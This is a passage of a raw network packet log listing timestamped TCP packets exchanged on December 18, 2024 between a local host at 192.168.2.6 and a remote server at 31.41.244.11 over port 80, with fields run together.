                                                                                                                                                                  Dec 18, 2024 11:09:46.453499079 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.453500986 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.453514099 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.453562975 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.454638958 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.454648972 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.454678059 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.454700947 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.455363035 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.455374002 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.455411911 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.456975937 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.457009077 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.457036972 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.457042933 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.457056999 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.457077980 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.457086086 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.457214117 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.459408998 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.459460020 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.459460974 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.459498882 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.459508896 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.459544897 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.460618973 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.460706949 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.460717916 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.460753918 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.460800886 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.461592913 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.461627960 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.461647987 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.461671114 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.462626934 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.462661028 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.462722063 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.463479042 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.463552952 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.463778019 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.463830948 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.464307070 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.464420080 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.464515924 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.464570999 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.465214968 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.465264082 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.465363979 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.465424061 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.466145039 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.466259003 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.466351986 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.466396093 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.467221975 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.467278004 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.467369080 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.467417955 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.468338013 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.468372107 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.468410969 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.468422890 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.469274998 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.470045090 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.470104933 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.470371008 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.470582962 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.470921993 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.470976114 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.471507072 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.471584082 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.471659899 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.471709013 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.472417116 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.472465038 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.472477913 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.472513914 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.473377943 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.473429918 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.473686934 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.473743916 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.474591970 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.474631071 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.474646091 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.474674940 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.475397110 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.475447893 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.475559950 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.475605011 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.478110075 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.478144884 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.478168011 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.478180885 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.478189945 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.478215933 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.478221893 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.478255033 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.479401112 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.479454041 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.479456902 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.479496956 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.479521036 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.479573011 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.480707884 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.480741978 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.480788946 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.480789900 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.480832100 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.481739044 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.481842995 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.483403921 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.483438015 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.483453035 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.483472109 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.483477116 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.483589888 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.483849049 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.483891010 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.484425068 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.484476089 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.484947920 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.484982014 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.485004902 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.485021114 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.486094952 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.486145020 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.486637115 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.486684084 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.487139940 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.487188101 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.487508059 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.487559080 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.487946987 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.487973928 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.487999916 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.488018990 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.488735914 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.488800049 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.625894070 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.625972986 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.627413988 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.627454996 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.627495050 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.627511024 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.627549887 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.627548933 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.627629995 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.628521919 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.628556013 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.628577948 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.628593922 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.628603935 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.628684998 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.630387068 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.630424023 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.630439043 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.630471945 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.630506992 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.630542040 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.630558968 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.630585909 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.631534100 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.631583929 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.632879972 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.632915974 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.632951975 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.632963896 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.632998943 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.633043051 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.633548975 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.633636951 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.634669065 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.634705067 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.634742022 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.634762049 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.634793997 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.636061907 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.636121988 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.636811972 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.636847019 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.636882067 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.636883020 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.636898041 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.636972904 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.637826920 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.637862921 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.637876034 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.637911081 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.638878107 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.638958931 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.639389038 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.639440060 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.640764952 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.640799999 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.640815973 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.640836954 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.640851021 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.640886068 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.642803907 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.642838955 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.642863989 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.642874956 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.642887115 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.642913103 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.642951965 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.642970085 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.643395901 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.643472910 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.644324064 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.644360065 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.644404888 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.645401001 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.645436049 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.645457029 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.645482063 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.646444082 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.646478891 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.646524906 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.647408962 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.647463083 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.647485971 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.647501945 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.648969889 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.649005890 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.649024963 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.649041891 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.649050951 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.649076939 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.651060104 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.651094913 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.651114941 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.651129961 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.651139021 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.651166916 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.651171923 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.651206970 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.651386023 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.651513100 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.653090954 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.653126001 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.653158903 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.653167963 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.653178930 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.653218031 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.654592037 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.654632092 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.654666901 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.654676914 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.655420065 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.655456066 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.655472040 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.655491114 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.655499935 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.655538082 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.656722069 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.656759977 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.656793118 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.656809092 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.658663988 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.658699036 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.658724070 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.658734083 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.658742905 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.658770084 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.658778906 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.658807993 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.659389019 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.659444094 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.659538984 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.659589052 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.661324978 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.661361933 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.661391020 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.661396980 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.661401987 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.661437035 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.662435055 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.662471056 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.662499905 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.662512064 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.662635088 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.662691116 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.663419008 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.663495064 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.664482117 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.664518118 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.664535999 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.664554119 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.664571047 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.664707899 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.665498018 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.665544987 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.666575909 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.666611910 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.666649103 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.666650057 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.666671038 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.666687012 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.667551994 CET804996631.41.244.11192.168.2.6
                                                                                                                                                                  Dec 18, 2024 11:09:46.667643070 CET4996680192.168.2.631.41.244.11
                                                                                                                                                                  Dec 18, 2024 11:09:46.668081045 CET804996631.41.244.11192.168.2.6
